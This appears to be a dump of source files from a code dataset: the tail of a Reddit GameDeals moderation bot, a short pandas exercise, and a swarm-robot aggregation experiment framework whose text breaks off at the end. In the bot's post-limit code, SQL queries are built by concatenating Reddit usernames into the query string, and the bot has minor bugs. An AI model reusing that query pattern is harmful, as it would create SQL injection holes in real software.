[Rule 9](https://www.reddit.com/r/GameDeals/wiki/rules#wiki_9._developers_and_publishers), then [contact the mods for approval](https://www.reddit.com/message/compose?to=%2Fr%2FGameDeals).\"\n else:\n removereason = \"* It appears to be a part of the [Weeklong deals](https://redd.it/\" + rows[0][2] + \"). \\n\\nAs there are multiple games on sale, please include a comment within the existing thread to discuss this deal.\\n\\nIf you are the developer or publisher of this game, please leave a detailed disclosure as a top level comment as per [Rule 9](https://www.reddit.com/r/GameDeals/wiki/rules#wiki_9._developers_and_publishers), then [contact the mods for approval](https://www.reddit.com/message/compose?to=%2Fr%2FGameDeals).\"\n comment = submission.reply(\"Unfortunately, your submission has been removed for the following reasons:\\n\\n\" + \n removereason +\n \"\\n\\nI am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](https://www.reddit.com/message/compose/?to=/r/GameDeals) if you have any questions or concerns.\"\n )\n comment.mod.distinguish(sticky=True)\n submission.mod.remove()\n return\n\n\n getexp = getsteamexpiry( url )\n if getexp is not None:\n try:\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('INSERT into schedules(postid, schedtime) values(?,?)',(submission.id,getexp) )\n con.commit()\n con.close()\n logging.info(\"[Steam] | \" + submission.title + \" | https://redd.it/\" + submission.id )\n logging.info(\"setting up schedule: bot for: \" + submission.id)\n reply_reason = \"Steam Game\"\n post_footer = False\n #reply_text = \"^(automatic deal expiry set for \" + datetime.datetime.fromtimestamp(int(getexp)).strftime('%Y-%m-%d %H:%M:%S') + \" UTC)\\n\\n\"\n except:\n pass\n\n### Bundle Giveaways\n if re.search(\"(fanatical\\.com/(.*)bundle|(?!freebies\\.)indiegala\\.com(?!(/store|/crackerjack)))\", url) is not None:\n if re.search(\"indiegala.com.+giveaway\", url) is None and re.search(\"freebies.indiegala.com\", url) is None:\n reply_reason = \"Bundle Giveaway\"\n reply_text = \"\"\"\n**Giveaways**\n\nIf you wish to give away your extra game keys, please post them under this comment only. Do not ask for handouts or trades.\"\"\"\n\n### Bundle Giveaways for Humble\n if re.search(\"(humblebundle\\.com(?!(/g/|/store|/monthly)))\", url) is not None:\n if re.search(\"indiegala.com.+giveaway\", url) is None and re.search(\"freebies.indiegala.com\", url) is None:\n reply_reason = \"Bundle Giveaway\"\n reply_text = \"\"\"\n**Warning**\n\nWith current reports of Humble Bundle account access being restricted, we would like to remind people that the supplied keys are for personal use only as stated on the bundle pages. There may be a risk of account suspensions on Humble Bundle for trading/gifting. \n[^(more information)](https://redd.it/hwobv8)\n\n**Giveaways**\n\nIf you wish to give away your extra game keys, please post them under this comment only. Do not ask for handouts or trades.\"\"\"\n\n reply_text = \"\"\"\n**Giveaways**\n\nIf you wish to give away your extra game keys, please post them under this comment only. Do not ask for handouts or trades.\"\"\"\n\n### chrono.gg auto expire\n if re.search(\"chrono.gg\", url) is not None:\n try:\n r = requests.get( url )\n match1 = re.search('\"endsAt\":\"([\\w\\-\\:\\.]+)\"', r.text)\n enddate= dateparser.parse( match1.group(1) , settings={'PREFER_DATES_FROM': 'future', 'TO_TIMEZONE': 'UTC' } )\n expdate = time.mktime( enddate.timetuple() )\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('INSERT into schedules(postid, schedtime) values(?,?)',(submission.id,expdate) )\n con.commit()\n con.close\n logging.info(\"[Chrono] | \" + submission.title + \" | https://redd.it/\" + submission.id )\n logging.info(\"setting up schedule: bot for: \" + submission.id)\n reply_reason = \"chrono.gg\"\n post_footer = False\n #reply_text = \"^(automatic deal expiry set for \" + datetime.datetime.fromtimestamp(int(expdate)).strftime('%Y-%m-%d %H:%M:%S') + \" UTC)\\n\\n\"\n except:\n pass\n\n### GamersGate coupon Info\n if re.search(\"gamersgate.com\", url) is not None:\n reply_reason = \"GamersGate Coupon\"\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n### 2game coupon Info\n if re.search(\"2game.com\", url) is not None:\n reply_reason = \"2Game Coupon\"\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n### oculiumvr.com Info\n if re.search(\"oculiumvr.com\", url) is not None:\n reply_reason = \"2Game Coupon\"\n reply_text = \"\"\"\n**Notice** \nOculiumVR sells game keys that are redeemable on the Oculus Store. OculiumVR is based in Australia and charges in AUD, so outside purchases may incur a conversion fee.\n\"\"\"\n\n### allyouplay coupon Info\n if re.search(\"allyouplay.com\", url) is not None:\n reply_reason = \"allyouplay Coupon\"\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n### Voidu coupon Info\n if re.search(\"voidu.com\", url) is not None:\n reply_reason = \"Voidu Coupon\"\n#**Notice:** Payment is only possible in euros. Purchases with other currencies are still possible, but currency conversion fees will apply. As such, listed prices are only a guide unless paying in euros.\n reply_text = \"\"\"\n**Coupon** \nUse the site-wide coupon `RGAMEDEALS` for an additional 10% off. \n^(May not be available on all offers. We do not receive compensation for this code.)\"\"\"\n\n\n\n### GOG.com Info\n if re.search(\"gog.com\", url) is not None:\n reply_reason = \"GOG.com Info\"\n reply_text = \"\"\"\nGOG.com sells games that are completely DRM-free. This means that there is nothing preventing or limiting you from installing and playing the game. \n\n**As such, games from GOG never come with Steam keys.**\n\n[More Information](https://support.gog.com/hc/en-us/articles/360001947574-FAQ-What-is-GOG-COM-?product=gog)\n\nThis message is posted automatically to inform new users about what this service provides in order to answer some commonly asked questions.\"\"\"\n\n### Itch.io\n# if re.search(\"itch.io\", url) is not None:\n# reply_reason = \"Itch.io Info\"\n# reply_text = \"\"\"\n#Games from EA Origin do not come with Steam keys, unless explicitly stated. Origin games will require the download and use of the Origin client. If you wish to add a game shortcut to your Steam library, you can do so by adding it as a *Non-Steam Game* from the *Games* menu of the Steam client.\n#\n#[More Information](http://www.origin.com/us/faq)\"\"\"\n#\n### Origin\n if re.search(\"origin.com\", url) is not None:\n reply_reason = \"Origin Info\"\n reply_text = \"\"\"\nGames from EA Origin do not come with Steam keys, unless explicitly stated. Origin games will require the download and use of the Origin client. If you wish to add a game shortcut to your Steam library, you can do so by adding it as a *Non-Steam Game* from the *Games* menu of the Steam client.\n\n[More Information](http://www.origin.com/us/faq)\"\"\"\n\n### Groupees Preorders\n\n if re.search(\"groupees.com\", url) is not None:\n if re.search(\"(pre-?order|pre-?purchase|preorder|pre order|presale|pre sale|pre-sale)\", submission.title.lower() ) is not None:\n reply_reason = \"Groupees Preorder\"\n reply_text = \"\"\"\nAbout Groupees' pre-orders: \n\nThis is a blind pre-purchase of the full bundle at a reduced price. The games will be revealed tomorrow at normal price\"\"\"\n\n\n### IndieGala Giveaway Explanation\n if re.search(\"indiegala\\.com.+giveaway\", url) is not None:\n reply_reason = \"IndieGala giveaways\"\n reply_text = \"IndieGala giveaways are usually located towards the bottom of the page. You may need to dismiss a banner image or confirm a captcha to claim a key.\\n\"\n\n### IndieGala freebies Explanation\n if re.search(\"freebies\\.indiegala\\.com\", url) is not None:\n reply_reason = \"IndieGala freebies\"\n reply_text = \"IndieGala freebies are usually DRM-free downloads. In these cases no Steam key will be provided.\"\n\n### Fireflower Games\n if re.search(\"fireflowergames\\.com\", url) is not None:\n reply_reason = \"Fireflower Games\"\n reply_text = \"\"\"\nFireFlower Games sells games that are completely DRM-free. This means that there is nothing preventing or limiting you from installing and playing the game.\n\n**As such, games from FireFlower Games never come with Steam keys.**\n\n[More Information](https://fireflowergames.com/faq)\n\nThis message is posted automatically to answer some commonly asked questions about what this service provides\"\"\"\n\n### Amazon US Charities\n if re.search(\"(amazon\\.com\\/(.*\\/)?dp|amazon\\.com\\/(.*\\/)?gp\\/product|amazon\\.com\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.com)\\/(\\w{10})\", url) is not None:\n match1 = re.search(\"(amazon\\.com\\/(.*\\/)?dp|amazon\\.com\\/(.*\\/)?gp\\/product|amazon\\.com\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.com)\\/(\\w{10})\", url)\n amzn = match1.group(5)\n reply_reason = \"Amazon US Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Child's Play](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=childsplaycha-20)\n* [Electronic Frontier Foundation](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=electronicfro-20)\n* [Able Gamers](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=ablegamers-20)\n* [Mercy Corps](https://smile.amazon.com/dp/\"\"\"+amzn+\"\"\"?tag=mercycorps-20)\"\"\"\n\n### Amazon US Charities NODE\n if re.search(\"amazon\\.com\\/.*node=(\\d+)\", url) is not None:\n match1 = re.search(\"(amazon\\.com\\/(.*\\/)?dp|amazon\\.com\\/(.*\\/)?gp\\/product|amazon\\.com\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.com)\\/(\\w{10})\", url)\n amzn = match1.group(1)\n reply_reason = \"Amazon US Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Child's Play](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=childsplaycha-20)\n* [Electronic Frontier Foundation](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=electronicfro-20)\n* [Able Gamers](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=ablegamers-20)\n* [Mercy Corps](https://smile.amazon.com/b/?node=\"\"\"+amzn+\"\"\"&tag=mercycorps-20)\"\"\"\n\n\n### Amazon UK Charities\n if re.search(\"(amazon\\.co\\.uk\\/(.*\\/)?dp|amazon\\.co\\.uk\\/(.*\\/)?gp\\/product|amazon\\.co\\.uk\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.co\\.uk)\\/(\\w{10})\", url) is not None:\n match1 = re.search(\"(amazon\\.co\\.uk\\/(.*\\/)?dp|amazon\\.co\\.uk\\/(.*\\/)?gp\\/product|amazon\\.co\\.uk\\/(.*\\/)?exec\\/obidos\\/ASIN|amzn\\.co\\.uk)\\/(\\w{10})\", url)\n amzn = match1.group(5)\n reply_reason = \"Amazon UK Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Centre Point](https://www.amazon.co.uk/dp/\"\"\"+amzn+\"\"\"?tag=centrepoint01-21)\"\"\"\n\n### Amazon UK Charities NODE\n if re.search(\"amazon\\.co\\.uk\\/.*node=(\\d+)\", url) is not None:\n match1 = re.search(\"amazon\\.co\\.uk\\/.*node=(\\d+)\", url)\n amzn = match1.group(1)\n reply_reason = \"Amazon UK Charities\"\n reply_text = \"\"\"\nCharity links:\n\n* [Centre Point](https://www.amazon.co.uk/dp/?node=\"\"\"+amzn+\"\"\"&tag=centrepoint01-21)\"\"\"\n\n\n\n if post_footer:\n if reply_text is not \"\":\n comment = submission.reply(reply_text+\"\\n\\n*****\\n\\n\"+footer)\n else:\n comment = submission.reply(footer)\n comment.mod.distinguish(sticky=True)\n logging.info(\"Replied to: \" + submission.title + \" Reason: \" + reply_reason)\n logID(submission.id)\n return\n\n\n\n#submission = reddit.submission(\"l2na5l\")\n#respond( submission )\n\n\n\n\nwhile True:\n try:\n logging.info(\"Initializing bot...\")\n for submission in subreddit.stream.submissions():\n if submission.created < int(time.time()) - 86400:\n continue\n if submission.title[0:1].lower() == \"[\" or submission.title[0:1].lower() == \"[\":\n\n\n if submission.id in open(apppath+'postids.txt').read():\n continue\n #logging.info(\"Week: \"+time.strftime('%Y%W'))\n #logging.info(\"Day: \"+time.strftime('%Y%m%d'))\n #logging.info(\"User: \"+submission.author.name)\n\n donotprocess=False\n\n ### handle weeklong deals\n if re.search(\"steampowered.com.*?filter=weeklongdeals\", submission.url) is not None:\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n today = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n monday = today - datetime.timedelta(days=today.weekday())\n datetext = monday.strftime('%Y%m%d')\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM weeklongdeals WHERE week = ' + datetext )\n rows = cursorObj.fetchall()\n if len(rows) == 0:\n today = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n monday = today - datetime.timedelta(days=today.weekday())\n cursorObj.execute('INSERT INTO weeklongdeals (week, post) VALUES (?, ?)', (monday.strftime('%Y%m%d'), submission.id))\n con.commit()\n\n\n ###\n\n### Weekly Post Limit\n if Config.WeeklyPostLimit > 0:\n currentweek = time.strftime('%Y%W')\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM weeklyposts WHERE username = \"'+submission.author.name+'\" AND currentweek = '+currentweek)\n rows = cursorObj.fetchall()\n if len(rows) is 0:\n cursorObj.execute('INSERT INTO weeklyposts(username, postcount, currentweek) VALUES(\"'+submission.author.name+'\",1,'+currentweek+')')\n con.commit()\n else:\n curcount = rows[0][2]\n if int(curcount) > int(Config.WeeklyPostLimit):\n donotprocess=True\n logging.info(submission.author.name+' is over their weekly post limit')\n submission.mod.remove()\n comment = submission.reply(\"Thank you for your submission, but you have reached your weekly post limit\\n\\n^^^^^\\n\\nYou may contact the modderators if you feel you are being picked on\")\n comment.mod.distinguish(sticky=True)\n else:\n curcount=curcount+1\n cursorObj.execute(\"UPDATE weeklyposts SET postcount = \" + str(curcount) + ' WHERE id = ' + str(rows[0][0]))\n con.commit()\n con.close()\n###\n\n\n### Daily Post Limit\n if Config.DailyPostLimit > 0:\n currentday = time.strftime('%Y%m%d')\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM dailyposts WHERE username = \"'+submission.author.name+'\" AND currentday = '+currentday)\n rows = cursorObj.fetchall()\n if len(rows) is 0:\n cursorObj.execute('INSERT INTO dailyposts(username, postcount, currentday) VALUES(\"'+submission.author.name+'\",1,'+currentday+')')\n con.commit()\n else:\n curcount = rows[0][2]\n if int(curcount) > int(Config.DailyPostLimit):\n donotprocess=True\n logging.info(submission.author.name+' is over their daily post limit')\n submission.mod.remove()\n comment = submission.reply(\"Thank you for your submission, but you have reached your daily post limit\\n\\n^^^^^\\n\\nYou may contact the modderators if you feel you are being picked on\")\n comment.mod.distinguish(sticky=True)\n else:\n curcount=curcount+1\n cursorObj.execute(\"UPDATE dailyposts SET postcount = \" + str(curcount) + ' WHERE id = ' + str(rows[0][0]))\n con.commit()\n con.close\n###\n\n\n\n\n for top_level_comment in submission.comments:\n try:\n if top_level_comment.author and top_level_comment.author.name == Config.user:\n logID(submission.id)\n break\n except AttributeError:\n pass\n else: # no break before, so no comment from GDB\n if not donotprocess:\n respond(submission)\n continue\n\n\n except (prawcore.exceptions.RequestException, prawcore.exceptions.ResponseException):\n logging.info(\"Error connecting to reddit servers. Retrying in 1 minute...\")\n time.sleep(60)\n\n except praw.exceptions.APIException:\n logging.info(\"Rate limited, waiting 5 seconds\")\n time.sleep(5)\n","sub_path":"reddit_response.py","file_name":"reddit_response.py","file_ext":"py","file_size_in_byte":23457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"269475463","text":"import pandas as pd\nfrom FileLoader import FileLoader as loader\n\ndef ProportionBySport(df, year, sport, gender):\n\tdata = df.loc[lambda data: data[\"Year\"] == int(year)]\n\tdata = data.loc[lambda data: data[\"Sex\"] == gender]\n\tdata = data.drop_duplicates(subset=\"Name\")\n\tresult = data.shape[0]\t\n\tdata = data.loc[lambda data: data[\"Sport\"] == sport]\n\tresult = data.shape[0] / result\n\treturn result\n\ndef main():\n\t\"\"\" Main program \"\"\"\n\tdata = loader.load(\"../ex00/athlete_events.csv\")\n\tprint(ProportionBySport(data, 2004,\"Tennis\", 'F'))\n\treturn 0\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bootcamp_python/Day04/ex02/ProportionBySport.py","file_name":"ProportionBySport.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"347566585","text":"# Project: SwarmAggregation\n# Filename: exp.py\n# Authors: Joshua J. Daymude (jdaymude@asu.edu) and Noble C. Harasha\n# (nharasha@mit.edu).\n\n\"\"\"\nexp: A flexible, unifying framework for defining and running experiments for\n swarm aggregation.\n\"\"\"\n\nimport argparse\nfrom aggregation import aggregation, ideal\nfrom itertools import product\nfrom math import sin, cos, hypot, ceil\nfrom matplotlib.animation import FFMpegWriter, ArtistAnimation\nimport matplotlib.cm as cm\nfrom matplotlib.collections import LineCollection, PatchCollection, PolyCollection\nimport matplotlib.pyplot as plt\nfrom metrics import *\nimport numpy as np\nimport pickle\nfrom tqdm import tqdm\n\n\nclass Experiment(object):\n \"\"\"\n A flexible, unifying framework for experiments.\n \"\"\"\n\n def __init__(self, id, params={}, iters=1, savehist=True, seed=None):\n \"\"\"\n Inputs:\n - id (str): identifier for the experiment\n - params (dict): the full parameter set for the simulation runs\n {\n 'N' : [int > 0] number of robots,\n 'R' : [float > 0] radius of rotation (m),\n 'r' : [float > 0] radius of a robot (m),\n 'm' : [float > 0] mass of a robot (kg),\n 'w0' : [float] rot. speed of a robot about its center (rad/s),\n 'w1' : [float] rot. speed of a robot in place (rad/s),\n 'sensor' : [0 <= float <= pi] size of the sight sensor (rad),\n 'noise' : [(str, float)] either ('err', p) for error probability\n with probability p or ('mot', f) for motion noise with\n maximum force f (N),\n 'time' : [float > 0] wall-clock duration of simulation (s),\n 'step' : [float > 0] wall-clock duration of a time step (s),\n 'stop' : [float >= 0] if not None, simulation stops if system's\n dispersion is within stop% of the ideal value,\n 'init' : ['rand', 'symm'] initialization mode\n }\n - iters (int): the number of iterated runs for each parameter setting\n - savehist (bool): True if a run's history should be saved\n - seed (int): random seed\n \"\"\"\n # Unpack singular parameters.\n self.id, self.iters, self.savehist, self.seed, = id, iters, savehist, seed\n\n # Unpack aggregation parameters.\n defaults = {'N' : [100], 'R' : [0.1445], 'r' : [0.037], 'm' : [0.125], \\\n 'w0' : [-0.75], 'w1' : [-5.02], 'sensor' : [0], \\\n 'noise' : [('err', 0)], 'time' : [300], 'step' : [0.005], \\\n 'stop' : [None], 'init' : ['rand']}\n plist = [params[p] if p in params else defaults[p] for p in defaults]\n self.params = list(product(*plist))\n\n # Set up data and results filenames.\n self.fname = 'exp_{}_{}'.format(self.id, self.seed)\n\n # Instantiate a list to hold runs data. This data will have shape\n # A x B x [S x N x 3, 1] where A is the number of runs (i.e., unique\n # parameter combinations), B is the number of iterations per run, S is\n # the number of time steps simulated, N is the number of robots, and 3\n # represents each robot's X/Y/Theta data.\n self.runs_data = [[] for p in self.params]\n\n\n def run(self):\n \"\"\"\n Run this experiment according to the input parameters.\n \"\"\"\n tqdm.write('Running Experiment ' + self.id + '...')\n\n # Set up random seeds for iterated runs.\n rng = np.random.default_rng(self.seed)\n run_seeds = rng.integers(0, 2**32, size=self.iters)\n\n # For each parameter combination, do iterated runs of aggregation.\n silent = len(self.params) > 1 or self.iters > 1\n for i, param in enumerate(tqdm(self.params, desc='Simulating runs')):\n N, R, r, m, w0, w1, sensor, noise, time, step, stop, init = param\n for seed in tqdm(run_seeds, desc='Iterating run', \\\n leave=bool(i == len(self.params) - 1)):\n run_data = aggregation(N, R, r, m, w0, w1, sensor, noise, time,\\\n step, stop, init, seed, silent)\n if not self.savehist:\n # Only save the final configuration.\n history, final = run_data\n self.runs_data[i].append((np.copy(history[final-1]), final))\n else:\n # Save the entire configuration history.\n self.runs_data[i].append(run_data)\n\n\n def save(self):\n \"\"\"\n Saves this experiment, including all parameters and run data, to a file\n named according to the experiment's ID and seed.\n \"\"\"\n tqdm.write('Saving Experiment ' + self.id + '...')\n with open('data/' + self.fname + '.pkl', 'wb') as f:\n pickle.dump(self, f)\n\n\n def plot_evo(self, runs, iters, metrics=['sed', 'hull', 'disp', 'clus'], \\\n labels=None, title='', anno=''):\n \"\"\"\n Takes indices of either (i) one run and multiple iterations or (ii) one\n iteration of multiple runs and plots the given metrics against time.\n \"\"\"\n tqdm.write('Plotting metrics over time...')\n\n # Sanity checks and setup. Assumes N, r, time, and step are static.\n assert self.savehist, 'ERROR: No history to calculate metrics per step'\n assert len(runs) == 1 or len(iters) == 1, 'ERROR: One run or one iter'\n runits = [i for i in product(runs, iters)]\n\n # Set up colors.\n cmap = np.vectorize(lambda x : cm.inferno(x))\n c = np.array(cmap(np.linspace(0, 1, len(runits) + 2))).T\n\n # Plot metrics over time for each run/iteration.\n names = {'sed' : 'Smallest Enclosing Disc Circumference', \\\n 'hull' : 'Convex Hull Perimeter', \\\n 'disp' : 'Dispersion', \\\n 'clus' : 'Cluster Fraction'}\n for metric in metrics:\n fig, ax = plt.subplots()\n for i, runit in enumerate(tqdm(runits)):\n # Plot the given metric over time.\n N, r, time, step = [self.params[runit[0]][j] for j in [0,2,8,9]]\n configs, final = self.runs_data[runit[0]][runit[1]]\n x = np.arange(0, time + step, step)[:final]\n y = []\n for config in tqdm(configs, desc='Calculating '+names[metric]):\n if metric == 'sed':\n y.append(sed_circumference(config))\n elif metric == 'hull':\n y.append(hull_perimeter(config))\n elif metric == 'disp':\n y.append(dispersion(config))\n else: # metric == 'clus'\n y.append(cluster_fraction(config, r))\n if labels != None:\n ax.plot(x, y, color=c[i+1], label=labels[i], zorder=4)\n else:\n ax.plot(x, y, color=c[i+1], zorder=4)\n\n # Plot the minimum value for this metric as a dashed line.\n if metric == 'sed':\n metric_min = sed_circumference(ideal(N, r))\n elif metric == 'hull':\n metric_min = hull_perimeter(ideal(N, r))\n elif metric == 'disp':\n metric_min = dispersion(ideal(N, r))\n else: # metric == 'clus'\n metric_min = cluster_fraction(ideal(N, r), r)\n ax.plot(x, np.full(len(x), metric_min), color=c[i+1], \\\n linestyle='dashed', zorder=3)\n\n # Save figure.\n ax.set(title=title, xlabel='Time (s)', ylabel=names[metric])\n ax.set_ylim(bottom=0)\n ax.grid()\n if labels != None:\n ax.legend(loc='upper right')\n plt.tight_layout()\n fig.savefig('figs/' + self.fname + '_' + metric + anno + '.png', \\\n dpi=300)\n plt.close()\n\n\n def plot_aggtime(self, N, ps, plabel, title='', anno=''):\n \"\"\"\n Plots final and average time to aggregation per parameter value per\n number of robots. Assumes that the only parameters that are varied are\n the number of robots (N) and one non-time related parameter.\n \"\"\"\n tqdm.write('Plotting average time to aggregation...')\n\n # Set up figure and colors.\n fig, ax = plt.subplots()\n cmap = np.vectorize(lambda x : cm.inferno(x))\n c = np.array(cmap(np.linspace(0, 1, len(N) + 2))).T\n\n # Plot simulation time cutoff as a dashed line.\n time, step = self.params[0][8], self.params[0][9]\n ax.plot(ps, np.full(len(ps), time), color='k', linestyle='dashed')\n\n # Plot iteration times as a scatter plot and averages as lines.\n for i, ni in enumerate(N):\n xs, ys, aves = [], [], []\n for j, run in enumerate(self.runs_data[i*len(ps):(i+1)*len(ps)]):\n agg_times = []\n for iter in run:\n xs.append(ps[j])\n agg_times.append(iter[1] * step)\n ys += agg_times\n aves.append(np.mean(agg_times))\n ax.scatter(xs, ys, color=c[i+1], s=15, alpha=0.4)\n ax.plot(ps, aves, color=c[i+1], label='{} robots'.format(ni))\n\n # Save figure.\n ax.set(title=title, xlabel=plabel, ylabel='Aggregation Time (s)')\n ax.set_ylim(bottom=0)\n ax.grid()\n ax.legend(loc='upper left')\n plt.tight_layout()\n fig.savefig('figs/' + self.fname + '_aggtime' + anno + '.png', dpi=300)\n plt.close()\n\n\n def animate(self, run, iter, frame=25, anno=''):\n \"\"\"\n Animate the robots' movement over time.\n \"\"\"\n tqdm.write('Animating robots\\' movement...')\n\n # Check that a configuration history exists.\n assert self.savehist, 'ERROR: No history to animate'\n\n # Check that the desired frame rate is valid.\n assert frame > 0, 'ERROR: Frame rate must be positive value'\n\n # Get data and parameters.\n configs, final = self.runs_data[run][iter]\n N, r, sensor, time, step = [self.params[run][i] for i in [0,2,6,8,9]]\n\n # Set up plot.\n fig, ax = plt.subplots(figsize=(5,5), dpi=300)\n all_xy = configs[:,:,:2].flatten()\n fig_min, fig_max = np.min(all_xy) - r, np.max(all_xy) + r\n ax.set(xlim=[fig_min, fig_max], ylim=[fig_min, fig_max])\n\n # Set up colors for the various robots.\n cmap = np.vectorize(lambda x : cm.inferno(x))\n c = np.array(cmap(np.linspace(0, 0.9, N))).T\n\n # Set up frame rate to target at most 'frame' fps in real time.\n frame_step = 1 if step >= 1 / frame else ceil(1 / frame / step)\n interval = (step * frame_step) * 1000 # ms\n\n ims = []\n max_dist = hypot(*np.full(2, fig_max-fig_min))\n for s in tqdm(np.arange(0, min(len(configs), final), frame_step)):\n title = plt.text(1.0, 1.02, '{:.2f}s of {}s'.format(s*step, time), \\\n ha='right', va='bottom', transform=ax.transAxes)\n robots, lines, cones = [], [], []\n for i in range(N):\n xy, theta = configs[s][i][:2], configs[s][i][2]\n sensor_xy = xy + np.array([r * cos(theta), r * sin(theta)])\n\n # Add this robot's circle artist.\n robots.append(plt.Circle(xy, radius=r, linewidth=0, color=c[i]))\n\n # Add this robot's sight sensor direction artist.\n vec = max_dist * np.array([cos(theta), sin(theta)])\n lines.append([sensor_xy, sensor_xy + vec])\n\n # Add this robot's cone-of-sight polygon artist.\n if sensor > 0:\n cw, ccw = theta - sensor / 2, theta + sensor / 2\n vec_cw = max_dist * np.array([cos(cw), sin(cw)])\n vec_ccw = max_dist * np.array([cos(ccw), sin(ccw)])\n tri_pts = [sensor_xy, sensor_xy+vec_cw, sensor_xy+vec_ccw]\n cones.append(plt.Polygon(tri_pts, color=c[i], alpha=0.15))\n\n # Add this step's artists to the list of artists.\n robots = PatchCollection(robots, match_original=True, zorder=3)\n lines = LineCollection(lines, linewidths=0.5, colors=c, alpha=0.75,\\\n zorder=2)\n cones = PatchCollection(cones, match_original=True, zorder=1)\n ims.append([title, ax.add_collection(robots), \\\n ax.add_collection(lines), ax.add_collection(cones)])\n\n # Animate.\n ani = ArtistAnimation(fig, ims, interval=interval, blit=True)\n ani.save('anis/' + self.fname + '_ani' + anno + '.mp4')\n plt.close()\n\n\ndef load_exp(fname):\n \"\"\"\n Load an experiment from the specified file.\n \"\"\"\n with open(fname, 'rb') as f:\n exp = pickle.load(f)\n\n return exp\n\n\n### DATA EXPERIMENTS ###\n\ndef exp_base(seed=None):\n \"\"\"\n With default parameters, investigate aggregation over time.\n \"\"\"\n params = {} # This uses all default values.\n exp = Experiment('base', params, seed=seed)\n exp.run()\n exp.save()\n exp.plot_evo(runs=[0], iters=[0])\n exp.animate(run=0, iter=0)\n\n\ndef exp_symm(seed=None):\n \"\"\"\n With default parameters and symmetric initialization, investigate\n aggregation over time for a few system sizes.\n \"\"\"\n N = [3, 5, 10]\n params = {'N' : N, 'init' : ['symm']}\n exp = Experiment('symm', params, seed=seed)\n exp.run()\n exp.save()\n exp.plot_evo(runs=np.arange(len(exp.params)), iters=[0], metrics=['disp'], \\\n labels=['{} robots'.format(i) for i in N], \\\n title='Symmetric Initial Configuration')\n\n\ndef exp_errprob(seed=None):\n \"\"\"\n With default parameters and a range of error probabilities, investigate\n average time to aggregation with a 15% stopping condition.\n \"\"\"\n N = [10, 25, 50, 100]\n errprob = np.arange(0, 0.501, 0.0125)\n params = {'N' : N, 'noise' : [('err', p) for p in errprob], 'stop' : [0.15]}\n exp = Experiment('errprob', params, iters=25, savehist=False, seed=seed)\n exp.run()\n exp.save()\n exp.plot_aggtime(N, errprob, 'Error Probability')\n\n\ndef exp_motion(seed=None):\n \"\"\"\n With default parameters and a range of motion noise strengths, investigate\n average time to aggregation with a 15% stopping condition.\n \"\"\"\n N = [10, 25, 50, 100]\n fmax = np.arange(0, 40.1, 1.25)\n params = {'N' : N, 'noise' : [('mot', f) for f in fmax], 'stop' : [0.15]}\n exp = Experiment('motion', params, iters=25, savehist=False, seed=seed)\n exp.run()\n exp.save()\n exp.plot_aggtime(N, fmax, 'Max. Noise Force (N)')\n\n\ndef exp_cone(seed=None):\n \"\"\"\n With default parameters and a range of sight sensor sizes, investigate\n average time to aggregation with a 15% stopping condition.\n \"\"\"\n N = [10, 25, 50, 100]\n sensor = np.arange(0, np.pi, 0.1)\n params = {'N' : N, 'sensor' : sensor, 'stop' : [0.15]}\n exp = Experiment('cone', params, iters=25, savehist=False, seed=seed)\n exp.run()\n exp.save()\n exp.plot_aggtime(N, sensor, 'Sight Sensor Size (rad)')\n\n\n### CALIBRATION EXPERIMENTS ###\n\ndef exp_step(seed=None):\n \"\"\"\n With default parameters and a range of time step durations, investigate\n aggregation over time.\n \"\"\"\n step = [0.0005, 0.001, 0.005, 0.01, 0.025]\n params = {'N' : [50], 'time' : [120], 'step' : step}\n exp = Experiment('step', params, seed=seed)\n exp.run()\n exp.save()\n exp.plot_evo(runs=np.arange(len(exp.params)), iters=[0], metrics=['disp'], \\\n labels=['{}s'.format(i) for i in step])\n\n\nif __name__ == '__main__':\n # Parse command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-E', '--exps', type=str, nargs='+', required=True, \\\n help='IDs of experiments to run')\n parser.add_argument('-R', '--rand_seed', type=int, default=None, \\\n help='Seed for random number generation')\n args = parser.parse_args()\n\n # Run selected experiments.\n exps = {'base' : exp_base, 'symm' : exp_symm, 'errprob' : exp_errprob, \\\n 'motion' : exp_motion, 'cone' : exp_cone, 'step' : exp_step}\n for id in args.exps:\n 